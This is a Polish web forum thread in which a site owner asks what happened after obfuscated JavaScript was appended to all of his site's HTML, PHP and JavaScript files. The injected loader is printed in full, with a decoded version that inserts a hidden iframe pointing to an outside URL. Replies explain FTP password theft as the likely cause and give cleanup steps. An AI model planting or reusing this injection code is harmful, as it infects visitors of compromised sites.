Atak na stronę

Witam

Dziś zorientowałem się, że wszystkie pliki HTML, PHP i JavaScript na moim serwerze zostały shackowane. Do każdego z nich został dopisany następujący kod:

/*336988*/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=110;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,115,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,115,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,110,111,112,40,92,91,110,90,104,94,92,92,97,91,100,105,92,94,109,100,94,102,104,93,92,99,89,39,93,106,100,39,93,91,111,88,39,107,95,103,37,104,97,106,34,50,5,3,26,27,23,24,113,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,114,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,111,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,115,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,113,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,115,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,113,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,115,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,113,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,114,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-465!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
/*/336988*/

Czy ktoś może powiedzieć, co ten kod robi, w jaki sposób się on rozprzestrzenia, jak serwer mógł zostać zainfekowany, oraz jak się przed tym bronić?

Mógł zostać zainfekowany jeśli masz wirusa na swoim komputerze (lub innym komputerze który ma dostęp do serwera) oraz używasz Total Commandera, FileZilli czy podobnego programu do FTP i masz zapamiętane hasła. Wtedy sobie wirus się loguje na twój FTP i dokleja kod do wszystkich plików.

kod w tej tablicy to

 


(function () {
    var x = document.createElement('iframe');

    x.src = 'http://www.advancedhairdesignocala.com/data/rel.php';
    x.style.position = 'absolute';
    x.style.border = '0';
    x.style.height = '1px';
    x.style.width = '1px';
    x.style.left = '1px';
    x.style.top = '1px';

    if (!document.getElementById('x')) {
        document.write('<div id=\'x\'></div>');
        document.getElementById('x').appendChild(x);
    }
})();

zapewne coś będzie próbowalo wyświetlić zawartość strony z pod tego adresu na twojej stronie.

Zapytanie pod ten adres (wykonane przez ten obfuskowany JS) zwracanie jedynie napis "ok" i nic więcej.

My to widzimy jako ok ale prawdopodobnie sprawdza jaki adres sie do niego odwołuje i moze wykonać coś innego niż ok :P
[edit] poza tym mogło już pobrać jakieś dane :P
lub po prostu czeka na wstawiene czegoś ciekawszego niz ok :D

Witam

Problem pojawił się następująco:

1. Musiałeś odwiedzić zarażoną stronę internetową i Twój komputer został zainfekowany trojanem
2. Trojan tzw backdoor wykradł hasła i zapisał na zewnętrznym serwerze i będzie logował się regularnie na skradzione hasła FTP nadpisując następujące pliki: index., footer., page.(nie pamiętam które jeszcze), o rozszerzeniach .html, .php, .tpl. oraz WSZYSTKIE pliki .js!

Jedyne działające i sprawdzone rozwiązanie:

1. Usunięcie ze źródeł szkodliwego kodu lub wgranie 'czystych' plików.
2. Zmiana wszystkich haseł FTP! Inaczej problem będzie się powtarzał bez końca ;)
3. Profilaktyczny skan komputera (polecam combofix'a)

PS. Trzeba to zrobić dokładnie, bo jeżeli zmienimy hasła ftp a gdzieś na naszej (/ lub klienta) stronie internetowej znajduje się ten złośliwy skrypt to hasła zostaną skradzione ponownie i będzie znów zabawa ;)

PS2. Aby uchronić się przed tego typu atakami, polecam nie zapisywać haseł w programie ftp.

Powodzenia